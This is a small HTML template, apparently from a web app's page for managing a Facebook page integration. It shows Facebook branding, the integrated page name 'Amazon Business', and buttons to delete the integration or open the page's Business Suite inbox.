<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="stylesheet" href="/stylesheet/signout.css" />
    <title>Facebook - Login</title>
  </head>
  <body>
    <div class="main">
      <div class="logo">
        <img
          src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"
          alt=""
        />
      </div>
      <form action="/signout" method="post">
      <div class="container">
        <span class="login">Facebook page Integration</span>
        <span class="login">Integrated Page:<b>Amazon Business</b></span>
        <button class="delete-btn"><a href ="/Logout">Delete Integration</a></button>
        <button class="login-btn"><a href ="https://business.facebook.com/latest/inbox/all?asset_id=254230271103548&nav_ref=profile_plus_business_suite_inbox_admin_prodash&mailbox_id=&selected_item_id=100005756195289&thread_type=FB_MESSAGE">Reply to Message</a></button>
        
      </div>
    </div>
  </form>
  </body>
</html>
